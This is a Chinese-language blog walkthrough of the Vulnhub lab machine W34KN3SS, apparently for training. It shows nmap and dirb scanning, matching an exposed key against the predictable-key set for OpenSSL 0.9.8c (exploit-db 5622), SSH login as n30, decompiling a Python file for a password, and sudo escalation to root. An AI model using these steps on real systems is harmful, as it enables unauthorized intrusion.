• Vulnhub-靶机-W34KN3SS: 1


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现

    地址:https://www.vulnhub.com/entry/w34kn3ss-1,270/

    直接nmap扫描

    根据扫描结果可知如下信息:

    目标存在一个域名http://weakness.jth 可以尝试绑定域名访问看看,同样首先是不绑定域名直接使用IP地址进行访问看看

    使用dirb进行目录爆破并没有得到有用的结果,尝试本地绑定hosts进行暴力破解目录,发现了如下信息

    首先直接访问这个域名看看

    看到一个n30 ,这里就要凭经验去猜测了,n30可能是用户名,我们继续向后看,根据dirb爆破出来的目录访问得到如下信息:

    http://weakness.jth/private/files/notes.txt

    http://weakness.jth/private/files/mykey.pub

     

    可以知道目标使用的openssl版本0.9.8c-1 ,然后目标在使用的公钥暴露了 ,我们先搜索下这个openssl版本是否存漏洞

    发现5622.txt这个编号的漏洞,直接复制到本地目录下来

    查看漏洞利用文本内容

    确认利用此漏洞是很简单的,那么我们直接把上述公钥和私钥文件下载下来

    使用命令:wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

    使用命令进行解压文件 tar -jxvf 5622.tar.bz2

    然后下载目标靶机的公钥 wget http://weakness.jth/private/files/mykey.pub

    开始比对公钥和私钥

    尝试直接登录目录靶机,用户名就是上面提到的n30

    ssh -i rsa/2048/4161de56829de2fe64b9055711f531c1-2537 192.168.5.147 -l n30

    上述发现除了user.txt文件之外还发现code可执行文件,使用file命令查看了类型确认是Python代码编写的文件,将此文件下载到本地kali分析看看

    下载至本地

    使用uncompyle2  或者 https://github.com/rocky/python-uncompyle6 对Python代码进行反编译

    根据上面反编译结果最终得出账号和密码为:n30:dMASDNB!!#B!#!#33

    尝试使用sudo可以直接提权为root

    成功获取root权限并获得flag

     

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    windows性能计数器
    bootstrap2.0与3.0的区别
    prototype.js简介
    .NET生成静态页面并分页
    .net 生成 静态页面
    传统的生成静态页面
    vimrc
    nginx模块动态加载(http)
    ffmpeg --help full
    confiure
  • 原文地址:https://www.cnblogs.com/autopwn/p/13596692.html
Copyright © 2020-2023  润新知